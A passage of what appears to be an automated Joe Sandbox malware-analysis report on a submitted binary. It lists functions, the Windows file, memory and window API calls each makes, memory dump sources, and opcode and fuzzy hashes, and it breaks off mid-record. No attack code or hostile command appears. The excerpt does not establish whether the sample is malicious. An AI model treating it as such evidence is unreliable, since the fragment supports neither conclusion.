                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A25940CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2655091166-0
                                                                          • Opcode ID: 45cd012e44c1ea1951e100f055d23ec2744ac20cc53ecf2ddac386a9fa93ee21
                                                                          • Instruction ID: 841e8cf9215cf9d4f8ef4a1d843f5d233028b5bef1f8e83ef409b09beadc9532
                                                                          • Opcode Fuzzy Hash: 45cd012e44c1ea1951e100f055d23ec2744ac20cc53ecf2ddac386a9fa93ee21
                                                                          • Instruction Fuzzy Hash: 6F015B78A04704BFD701CF66EC11956BBE8E78E720B22887BE804D36A0E6385A10DE18
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00451604 Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00451646
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0045166C), ref: 0045164E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastMove
                                                                          • String ID:
                                                                          • API String ID: 55378915-0
                                                                          • Opcode ID: c0091c7478651bb023fdc3e57b8347735b5c978529b19831f608ec334460ef2a
                                                                          • Instruction ID: 57412c2de2bde2b2a9805fafeac613dae152aa12b64c6f91c1867b3f37f776c5
                                                                          • Opcode Fuzzy Hash: c0091c7478651bb023fdc3e57b8347735b5c978529b19831f608ec334460ef2a
                                                                          • Instruction Fuzzy Hash: BF01FE71B046446BCB10DF795C4159EB7ECDB48715750457BFC04E3752D6784E04855C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004510F4 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451153), ref: 0045112D
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00451153), ref: 00451135
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: 9df6799d2deb5604f29dc944684a2a8f5f943dbd13ec3aef100c12e22da0ad7e
                                                                          • Instruction ID: 2e99f9ab552fbc56df806c3ed4a11eaf09234a16047ee46c2fb58af4c34436b5
                                                                          • Opcode Fuzzy Hash: 9df6799d2deb5604f29dc944684a2a8f5f943dbd13ec3aef100c12e22da0ad7e
                                                                          • Instruction Fuzzy Hash: F1F02871A44604ABCB00DFB5AC42A9EB7E8DB0D715B1145F7FD04E3792E6394E048598
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045128C Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteFileA.KERNEL32(00000000,00000000,004512E9,?,-00000001,?), ref: 004512C3
                                                                          • GetLastError.KERNEL32(00000000,00000000,004512E9,?,-00000001,?), ref: 004512CB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 2018770650-0
                                                                          • Opcode ID: f8db7b56bf8a9a54d59ee2d7b5184a4b5376af573ae6214083b0e3b1e2c70d75
                                                                          • Instruction ID: bd8feaa310c53350912bac505fe5cd46c6aff24ad7297d0b96d1d9052aedfe22
                                                                          • Opcode Fuzzy Hash: f8db7b56bf8a9a54d59ee2d7b5184a4b5376af573ae6214083b0e3b1e2c70d75
                                                                          • Instruction Fuzzy Hash: 12F0C871E04608ABCF00DFB59C4259EB7ECDB48715B5085F7FC04E3652E6385E14859C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00451464 Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,004514C3,?,?,00000000), ref: 0045149D
                                                                          • GetLastError.KERNEL32(00000000,00000000,004514C3,?,?,00000000), ref: 004514A5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 1799206407-0
                                                                          • Opcode ID: e17b5db4e343fd94e30e534fa130a123d661becf893d2ac77d3be9b7813e3ada
                                                                          • Instruction ID: d7471e736b24b3bb5787cc7ba159720b7e0b567afb63d73ad787c716b5a8a183
                                                                          • Opcode Fuzzy Hash: e17b5db4e343fd94e30e534fa130a123d661becf893d2ac77d3be9b7813e3ada
                                                                          • Instruction Fuzzy Hash: 80F0C871A04748ABCB10DFA59C4199EB3E8DB4A72676047B7FC14E3692E6385E048598
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004231AC Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 004231B9
                                                                          • LoadCursorA.USER32(00000000,00000000), ref: 004231E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CursorLoad
                                                                          • String ID:
                                                                          • API String ID: 3238433803-0
                                                                          • Opcode ID: aae096a89314637c6453d25c5342f24cc030d518ad25ac5b3f1f31990d67ac6e
                                                                          • Instruction ID: 4f47f79916221551be92d6970dee20b840cac536ee7260014ee3ac6489712308
                                                                          • Opcode Fuzzy Hash: aae096a89314637c6453d25c5342f24cc030d518ad25ac5b3f1f31990d67ac6e
                                                                          • Instruction Fuzzy Hash: C9F0A7117001145BD6205D3E6CC1D3A72688F87736B61033BFE2AD72D1C62E2D51426D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042E1F0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00008000), ref: 0042E1FA
                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,0042E244,?,00000000,0042E262,?,00008000), ref: 0042E229
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLibraryLoadMode
                                                                          • String ID:
                                                                          • API String ID: 2987862817-0
                                                                          • Opcode ID: 47d034d6c104ad3889763985cd5d076ad7b368865af99a999868f5179706add0
                                                                          • Instruction ID: 2bd629673230950b16c4bb4544665cc4d3578012b9e0763c9fae70ecea85f9d4
                                                                          • Opcode Fuzzy Hash: 47d034d6c104ad3889763985cd5d076ad7b368865af99a999868f5179706add0
                                                                          • Instruction Fuzzy Hash: 31F08270714744FEDF019F779C6282BBBECE74DB1479249B6F800A2691E63C5810C939
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0044FDD0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046BB71,?,00000000), ref: 0044FDE6
                                                                          • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046BB71,?,00000000), ref: 0044FDEE
                                                                            • Part of subcall function 0044FB8C: GetLastError.KERNEL32(0044F9A8,0044FC4E,?,00000000,?,00491CE4,00000001,00000000,00000002,00000000,00491E45,?,?,00000005,00000000,00491E79), ref: 0044FB8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: 6fde208f1bbd2e8b1a27b48321887b78cc6f72325f42f484ac007055b8b6af44
                                                                          • Instruction ID: 60b10378e44b0f0defca91e9e4490efccb0b8310a6ae63c26c4d70013a2aa3fa
                                                                          • Opcode Fuzzy Hash: 6fde208f1bbd2e8b1a27b48321887b78cc6f72325f42f484ac007055b8b6af44
                                                                          • Instruction Fuzzy Hash: FEE012F53056016BFB10EA7599C1F3B22D8DB48314F10447AB545CF186D674DC098B35
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406274 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Alloc
                                                                          • String ID:
                                                                          • API String ID: 2558781224-0
                                                                          • Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                          • Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
                                                                          • Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                          • Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 1bcf32e1270a55b637581478727a2e9913153c6ccf7aad1aa7fae9fef5c4f448
                                                                          • Instruction ID: 19192df4380cdbc1205a3ed9b24420002ad268da67895c40ec756cea1f38d7a4
                                                                          • Opcode Fuzzy Hash: 1bcf32e1270a55b637581478727a2e9913153c6ccf7aad1aa7fae9fef5c4f448
                                                                          • Instruction Fuzzy Hash: 1EF0A772B0073067EB60596A4C81F5359C49FC5798F154076FD0DFF3E9D6B58C0142A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00478A5C Relevance: 1.6, APIs: 1, Instructions: 128windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendNotifyMessageA.USER32(00020420,00000496,00002711,00000000), ref: 00478C14
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MessageNotifySend
                                                                          • String ID:
                                                                          • API String ID: 3556456075-0
                                                                          • Opcode ID: dd11d05620da802d8bb77eb810d1a1e8a62731b247d417d0c288434990103d14
                                                                          • Instruction ID: e9f93c3131ab9aed4d7988b9751f139f8c14b39f52ecba7056dfc34498fb85c2
                                                                          • Opcode Fuzzy Hash: dd11d05620da802d8bb77eb810d1a1e8a62731b247d417d0c288434990103d14
                                                                          • Instruction Fuzzy Hash: 0441A6746010008BC701FF66EC85A8B7BA5AB94309B65C57BB4049F3A7CA3CED478B5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041FB0C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FBA9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoScroll
                                                                          • String ID:
                                                                          • API String ID: 629608716-0
                                                                          • Opcode ID: 50e1310ba0544b59a0555e2be0f3aefd4cf1699031129a7841ddf0d9dd467a2f
                                                                          • Instruction ID: 884c2cb002146e47c45dd1875db58eae66db6a4caaf859e9ca4b80fd75174b4c
                                                                          • Opcode Fuzzy Hash: 50e1310ba0544b59a0555e2be0f3aefd4cf1699031129a7841ddf0d9dd467a2f
                                                                          • Instruction Fuzzy Hash: DD2130716087456FC340DF39D840696BBE4BB48344F148A3EA098C3341D774E99ACBD6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00467FB0 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0041EE14: GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                            • Part of subcall function 0041EE14: 73A25940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E804,?,00000001), ref: 0041EE69
                                                                          • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046800E,?,00000000,?,?,0046821B,?,00000000,0046825A), ref: 00467FF2
                                                                            • Part of subcall function 0041EEC8: IsWindow.USER32(?), ref: 0041EED6
                                                                            • Part of subcall function 0041EEC8: EnableWindow.USER32(?,00000001), ref: 0041EEE5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                                          • String ID:
                                                                          • API String ID: 390483697-0
                                                                          • Opcode ID: 1916fb52c999032ee8c755ca1a905755ac568ed81d39199cf5bb64b11a61d8f2
                                                                          • Instruction ID: 14fc102064ef3ab447e4390d65f6ef6ce5acf5f288e443c002039df4b727e1a7
                                                                          • Opcode Fuzzy Hash: 1916fb52c999032ee8c755ca1a905755ac568ed81d39199cf5bb64b11a61d8f2
                                                                          • Instruction Fuzzy Hash: 1AF0E975208300BFE7059FB2EC16B1677E8E349725F62087FF404971D0EA795844D51D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00440C28 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                          • Instruction ID: 8982111d837b22a654d5e287c7045eba67879d0a6afc285262999d3c1c57c6fe
                                                                          • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                          • Instruction Fuzzy Hash: 51F06234105109DF9F2CCF58D0E59AF7761EB45700B2085AFE60787350CA34AD20DA59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004164C0 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 004164F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 2af4b48136c97ef475e2d548a532a987733a71f7bd8abfe4e609d79a0b30ebbf
                                                                          • Instruction ID: 34aaedb761569f87127437b87f660ad39376ae005fde3180b2cf9fb4127eef57
                                                                          • Opcode Fuzzy Hash: 2af4b48136c97ef475e2d548a532a987733a71f7bd8abfe4e609d79a0b30ebbf
                                                                          • Instruction Fuzzy Hash: A7F013B2200510AFDB94CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD220EC108BB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00414924 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0041495F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                          • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                          • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                          • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042CBA8 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0042CBF0,?,00000001,?,?,00000000,?,0042CC42,00000000,004513A9,00000000,004513CA,?,00000000), ref: 0042CBD3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: fb728ae1967c572744be537d183b1c2397660519459ab9e6793d4da77068addf
                                                                          • Instruction ID: dfed850972a7f4cfed0b3d6ce6ead54829112a593105f6481b619d55be1254e6
                                                                          • Opcode Fuzzy Hash: fb728ae1967c572744be537d183b1c2397660519459ab9e6793d4da77068addf
                                                                          • Instruction Fuzzy Hash: 1AE06571304708BFD701EB62AC93E5EBBACD745714B914876B400A7651D5B8AE00845C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0044FC9C Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FCDC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 4695a6fd859b23d6e05288b159f4db2c373673df207a75ef7933aba3ac402c35
                                                                          • Instruction ID: 6c681f427aec3a456f64e3edeb529b69c7e2eff4e0c15a83e21b0084e331bb23
                                                                          • Opcode Fuzzy Hash: 4695a6fd859b23d6e05288b159f4db2c373673df207a75ef7933aba3ac402c35
                                                                          • Instruction Fuzzy Hash: BCE012A53541483ED340EEAD6C42FA777DC971A755F008033B998D7341D9A19E158BA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042E670 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451BF7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FormatMessage
                                                                          • String ID:
                                                                          • API String ID: 1306739567-0
                                                                          • Opcode ID: 860b655ccada46b5013a8742cf2038536e52ba062f8b3e277fa769ce81e13b95
                                                                          • Instruction ID: 7c82c80d86496392c3130c3e7de8882f0dfcc9e316fc406f93a4df2216b263d5
